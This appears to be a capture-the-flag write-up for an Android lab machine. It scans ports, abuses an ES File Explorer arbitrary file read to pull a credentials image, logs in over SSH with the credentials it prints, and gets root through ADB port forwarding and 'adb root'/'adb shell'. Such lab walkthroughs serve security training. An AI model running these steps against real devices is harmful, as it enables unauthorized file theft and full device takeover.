Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:57 EET
Nmap scan report for 10.10.10.247 (10.10.10.247)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
35971/tcp closed unknown
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.80%I=7%D=7/2%Time=60DF1B3D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service Info: Device: phoneFirst of all, lets look for exploits for these services (ES File Explorer & Bukkit JSONAPI). Found an arbitrary file read exploit for ( ES File Explorer 4.1.9.7.4) and didn't find any other exploits, so lets just try it.
By reading the exploit code, it's sending a POST request with Content-Type: application/json header and a json POST data as {"command": cmd} to http://10.10.10.247:59777/.
| Command | Description |
|---|---|
| listFiles | List all files |
| listPics | List all pictures |
| listVideos | List all videos |
| listAudios | List all audios |
| listApps | List installed applications |
| listAppsSystem | List system apps |
| listAppsPhone | List communication related apps |
| listAppsSdcard | List applications on SDCard |
| listAppsAll | List all applications |
| getFile | Download a file |
| getDeviceInfo | Get device info |
Lets first try the exploit manually before running the python script. Now visit http://10.10.10.247:59777/ intercept the request with burp or ZAP and send to repeater and edit the request as the exploit says. And we got a response with the device info. ![[Pasted image 20210702162329.png]]
Now that we understand how the exploit works, lets run the script because it parses the json response and make our life easier.
While enumeration i found that the ES File Explorer version is 4.1.9.7.3, that's why the exploit works ( if there's an exploit for a specific version, it may work on older versions too). ![[Pasted image 20210702165426.png]]
While trying every command i tried listPics and found interesting picture (creds.jpg).
![[Pasted image 20210702175549.png]]
I downloaded this picture using python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg and opened it. It has credentials in it.
kristi:Kr1sT!5h@Rp3xPl0r3! ![[Pasted image 20210702175752.png]]
Now lets ssh to the box with these creds and we are in. ![[Pasted image 20210702180057.png]]
Doing some research on the ports we found earlier, Port 5555 is for Android Debug Bridge (ADB) connections. And found on hacktricks how to use this service to get root shell.
https://book.hacktricks.xyz/mobile-apps-pentesting/android-app-pentesting/adb-commands
POC:
- First, We have to do port forwarding using ssh because the service is running on localhost only.
ssh -p 2222 -L 1337:localhost:5555 kristi@10.10.10.247![[Pasted image 20210702201835.png]] That means 127.0.0.1:1337 ==> 10.10.10.247:5555 - Connect to ADB service (port 5555) using adb tool.
adb connect <IP>:<PORT>![[Pasted image 20210702201811.png]] - Check if the phone is connected to your pc.
adb devices![[Pasted image 20210702203028.png]] - Now using adb tool we can do anything on the device, so to get root type
adb root![[Pasted image 20210702201727.png]] to restart adbd daemon with root permissions. - Connect again to the ADB service.
adb connect <IP>:<PORT> - Finally.
adb shell![[Pasted image 20210702201754.png]]